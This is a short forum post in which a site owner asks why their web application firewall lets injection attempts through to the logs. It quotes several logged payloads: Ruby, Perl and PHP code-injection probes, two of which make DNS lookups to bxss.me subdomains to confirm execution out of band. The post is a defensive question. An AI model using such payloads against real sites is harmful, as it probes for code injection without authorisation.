Firewall filtering

Hi,

There are troubling logs on my site. Strings that are injection attempts that get passed the WAF.
I see strings like:

‘’+‘A’.concat(70-3).concat(22*4).concat(101).concat(84).concat(119).concat(65)+(require’socket’

Socket.gethostbyname(‘hitfv’+‘xjwwd6c.bxss.me.’)[3].to_s)+’’

;print(md5(31337));$a=

gethostbyname(lc(‘hiton’.‘rqekcd7.bxss.me.’)).‘A’.chr(67).chr(hex(‘58’)).chr(118).chr(75).chr(98).chr(89)

Which are from injection attempts that I was expecting the WAF to filter or block but they get to the log which means they pass the WAF.

What am I missing here? Isn’t this something I should get by default when WAF is enabled?